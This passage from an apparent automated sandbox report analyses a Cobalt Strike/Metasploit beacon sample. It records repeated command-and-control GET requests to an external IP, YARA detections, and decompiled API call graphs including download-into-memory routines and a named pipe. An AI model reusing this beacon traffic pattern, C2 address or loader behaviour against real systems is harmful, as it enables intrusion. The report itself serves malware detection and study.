              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:39.875467062 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:39 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              139 | 192.168.2.4 | 50141 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:39.986138105 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:40.948199987 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:40 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              140 | 192.168.2.4 | 50142 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:41.067245960 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:42.114546061 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:41 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              141 | 192.168.2.4 | 50143 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:42.234565973 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:43.185681105 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:43 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              142 | 192.168.2.4 | 50144 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:43.299384117 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:44.313345909 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:44 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              143 | 192.168.2.4 | 50145 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:44.422158957 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:45.383543015 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:45 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              144 | 192.168.2.4 | 50146 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:45.500793934 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:46.458100080 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:46 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              145 | 192.168.2.4 | 50147 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:46.578566074 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:47.592161894 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:47 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              146 | 192.168.2.4 | 50148 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:47.704828024 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:48.718189001 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:48 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              147 | 192.168.2.4 | 50149 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:48.844898939 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:49.991286039 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:49 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              148 | 192.168.2.4 | 50150 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:50.119906902 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:51.068926096 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:50 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              149 | 192.168.2.4 | 50151 | 47.121.190.121 | 81 | 7148 | C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Timestamp | Bytes transferred | Direction | Data
              Jan 9, 2025 18:29:51.188457012 CET | 386 | OUT | GET /dot.gif HTTP/1.1
              Accept: */*
              Cookie: p1v7yS0VR0JIvuOPuPkZRvaGD53/hveHXXUBzKBJmoe+D+vS8RUTU7qQiT0/yuohkY4cyCn+35EdnDsWL0+JJLAD/jpqN7cf+4MRTo4RZUP0a3X+aY/mBpPtEOKAYdtIyBJuejibgZqNa9vGp+EYr/bBCPI4NaGs1DgkRFVMRi4=
              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS)
              Host: 47.121.190.121:81
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 9, 2025 18:29:52.315135956 CET | 114 | IN | HTTP/1.1 200 OK
              Date: Thu, 9 Jan 2025 17:29:52 GMT
              Content-Type: application/octet-stream
              Content-Length: 0


              Target ID:0
              Start time:12:26:53
              Start date:09/01/2025
              Path:C:\Users\user\Desktop\k2vUsu5VZ5.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\k2vUsu5VZ5.exe"
              Imagebase:0x400000
              File size:9'728 bytes
              MD5 hash:591C92301D93D233F0AB70817DB96AFD
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4094451143.0000000000160000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
              • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
              • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
              • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:false

                Execution Graph

                Execution Coverage:1.7%
                Dynamic/Decrypted Code Coverage:97.2%
                Signature Coverage:6.7%
                Total number of Nodes:252
                Total number of Limit Nodes:15
388120c 32413->32414 32413->32415 32414->32368 32417 38810d0 GetSystemTimeAsFileTime clock 32414->32417 32416 38811fd CryptReleaseContext 32415->32416 32416->32414 32417->32368 32420 388ec67 _DllMainCRTStartup 32419->32420 32421 388ec90 WSAIoctl 32420->32421 32422 388ec89 _DllMainCRTStartup 32420->32422 32421->32422 32422->32241 32423->32248 32425 38a7bac 32426 38a7bc1 32425->32426 32430 38a7bde 32425->32430 32427 38a7bcf 32426->32427 32426->32430 32433 389fbcc 8 API calls _getptd_noexit 32427->32433 32429 38a7bf6 HeapAlloc 32429->32430 32431 38a7bd4 32429->32431 32430->32429 32430->32431 32434 389fc68 DecodePointer 32430->32434 32433->32431 32434->32430 32435 160109 InternetConnectA 32436 160157 32435->32436 32438 160190 32436->32438 32440 1601c2 32436->32440 32443 160128 HttpOpenRequestA 32436->32443 32439 160331 InternetReadFile 32439->32440 32440->32439 32441 16030e VirtualAlloc 32440->32441 32442 160225 32440->32442 32441->32440 32445 16014f 32443->32445 32444 16030e VirtualAlloc 32444->32445 32445->32444 32446 160331 InternetReadFile 32445->32446 32447 16035a 32445->32447 32446->32445 32447->32436

                Control-flow Graph

                APIs
                • _snprintf.LIBCMT ref: 0388E43D
                  • Part of subcall function 0389D57C: _errno.LIBCMT ref: 0389D5B3
                  • Part of subcall function 0389D57C: _invalid_parameter_noinfo.LIBCMT ref: 0389D5BE
                  • Part of subcall function 038961C0: _snprintf.LIBCMT ref: 0389632D
                • _snprintf.LIBCMT ref: 0388E497
                • _snprintf.LIBCMT ref: 0388E4AE
                • HttpOpenRequestA.WININET ref: 0388E4F3
                • HttpSendRequestA.WININET ref: 0388E524
                • InternetQueryDataAvailable.WININET ref: 0388E554
                • InternetCloseHandle.WININET ref: 0388E572
                • InternetReadFile.WININET ref: 0388E5AE
                • InternetCloseHandle.WININET ref: 0388E5CF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Internet_snprintf$CloseHandleHttpRequest$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                • String ID: %s%s$*/*
                • API String ID: 1419689450-856325523
                • Opcode ID: 7aecab8f94b4036c401f8696ecf09a78fedfdcc2f5ec1353f6b97f9b95c732dc
                • Instruction ID: 5cd7e850fe0510ad7fe75be1bcfe2d06c6fa35544e7e5eaf9688511052342339
                • Opcode Fuzzy Hash: 7aecab8f94b4036c401f8696ecf09a78fedfdcc2f5ec1353f6b97f9b95c732dc
                • Instruction Fuzzy Hash: 8D51F77270478186EB10EFA5F84079EB7A5F788B98F444162EE4D9BB18EF38D505CB00

                Control-flow Graph

                control_flow_graph 65 401180-4011ae 66 401460-401463 GetStartupInfoA 65->66 67 4011b4-4011d1 65->67 71 401470-40148a call 402e88 66->71 68 4011e9-4011f4 67->68 69 4011f6-401204 68->69 70 4011d8-4011db 68->70 72 401417-401426 call 402e90 69->72 73 40120a-40120e 69->73 75 401400-401411 70->75 76 4011e1-4011e6 Sleep 70->76 82 401229-40122b 72->82 83 40142c-401447 _initterm 72->83 78 401490-4014a9 call 402e80 73->78 79 401214-401223 73->79 75->72 75->73 76->68 91 4014ae-4014d6 call 402e60 call 401990 call 401180 78->91 79->82 79->83 85 401231-40123e 82->85 86 40144d-401452 82->86 83->85 83->86 88 401240-401248 85->88 89 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 85->89 86->85 88->89 107 4012b2-4012b8 89->107 108 40129b 89->108 102 4014db-4014e1 91->102 110 4012a0-4012a2 107->110 111 4012ba-4012c8 107->111 109 4012f0-4012f6 108->109 112 4012f8-401302 109->112 113 40130e-401333 malloc 109->113 114 4012a4-4012a7 110->114 115 4012e9 110->115 116 4012ae 111->116 117 4013f0-4013f5 112->117 118 401308 112->118 119 401335-40133a 113->119 120 40137b-4013af call 401950 call 403040 113->120 121 4012d0-4012d2 114->121 122 4012a9 114->122 115->109 116->107 117->118 118->113 123 401340-401374 strlen malloc memcpy 119->123 131 4013b4-4013c2 120->131 121->115 125 4012d4 121->125 122->116 123->123 126 401376 123->126 128 4012d8-4012e2 125->128 126->120 128->115 130 4012e4-4012e7 128->130 130->115 130->128 131->91 132 4013c8-4013d0 131->132 132->71 133 4013d6-4013e5 132->133
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                • String ID: @P@
                • API String ID: 649803965-1136412694
                • Opcode ID: 8714a0a53b85a68ae96850f99c5d82bd34b46371170b9fae7742097e0e5346d9
                • Instruction ID: 77c4c0c2c4ec01c18778b245383d7dec7d454e94fa0d5fd388002b9db963459a
                • Opcode Fuzzy Hash: 8714a0a53b85a68ae96850f99c5d82bd34b46371170b9fae7742097e0e5346d9
                • Instruction Fuzzy Hash: C6818BB1601B0486EB259F56E99476A33A1F745B88F84803BDF48773A1DF7CC884C748

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Name$ComputerFileModuleUserVersion_snprintfmallocstrrchr
                • String ID: %s%s%s
                • API String ID: 1671524875-1891519693
                • Opcode ID: fae818eb8fd9c0c714db74ffe8fa15d39289cafcbec8ba44931ade20b9bcc588
                • Instruction ID: 1bfa0676650ac73d1b8238f0a7495b2d2245a1c34c681fd6a1136a3e29c60173
                • Opcode Fuzzy Hash: fae818eb8fd9c0c714db74ffe8fa15d39289cafcbec8ba44931ade20b9bcc588
                • Instruction Fuzzy Hash: 6A41F46970478146EE05FBA7B81472BA795FB89FD4F5881A1AE458FB98CF3CC0478701

                Control-flow Graph

                control_flow_graph 338 3881184-38811c0 CryptAcquireContextA 339 38811c2-38811e4 CryptAcquireContextA 338->339 340 38811e6-38811f9 call 38b0020 338->340 339->340 341 388120c-3881216 339->341 344 38811fb 340->344 345 38811fd-388120a CryptReleaseContext 340->345 344->345 345->341
                APIs
                • CryptAcquireContextA.ADVAPI32 ref: 038811B8
                • CryptAcquireContextA.ADVAPI32 ref: 038811DC
                • CryptGenRandom.ADVAPI32 ref: 038811F0
                • CryptReleaseContext.ADVAPI32 ref: 03881204
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Crypt$Context$Acquire$RandomRelease
                • String ID: ($Microsoft Base Cryptographic Provider v1.0
                • API String ID: 685801729-4046902070
                • Opcode ID: 0ecf2db09cc1f196f0e69c38021da81c9c4ab729bcee4d67f8373e38de0c364e
                • Instruction ID: 01093ab293d9b9556ca5de3900fbc488dd3ad8d1ce7ee7e2b488450b27077666
                • Opcode Fuzzy Hash: 0ecf2db09cc1f196f0e69c38021da81c9c4ab729bcee4d67f8373e38de0c364e
                • Instruction Fuzzy Hash: 4D015A76704B4682E710CFAAE88875AF765F7C8B84F888065EA4983765CF78C64AC740

                Control-flow Graph

                control_flow_graph 346 401630-40168d CreateNamedPipeA 347 4016dc-4016e5 346->347 348 40168f-4016a1 ConnectNamedPipe 346->348 348->347 349 4016a3-4016a5 348->349 350 4016c6-4016cf CloseHandle 349->350 351 4016a7-4016c4 WriteFile 349->351 350->347 351->350 352 4016d1-4016da 351->352 352->349
                APIs
                Strings
                • \\.\pipe\MSSE-7265-server, xrefs: 0040164F
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                • String ID: \\.\pipe\MSSE-7265-server
                • API String ID: 2239253087-1889910488
                • Opcode ID: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                • Instruction ID: 792960597df4a3593b3ed71ec0f1f42691249fcecf88183cb5a5311cb3ffe816
                • Opcode Fuzzy Hash: c91bc22eb4ab6627967eacdcd294d58c4f35a533641819062c461ff4691d2373
                • Instruction Fuzzy Hash: 7311A57171464487E7208B12EC4871B7660B785BA4F588639EF59277E4DF7DC409CB08

                Control-flow Graph

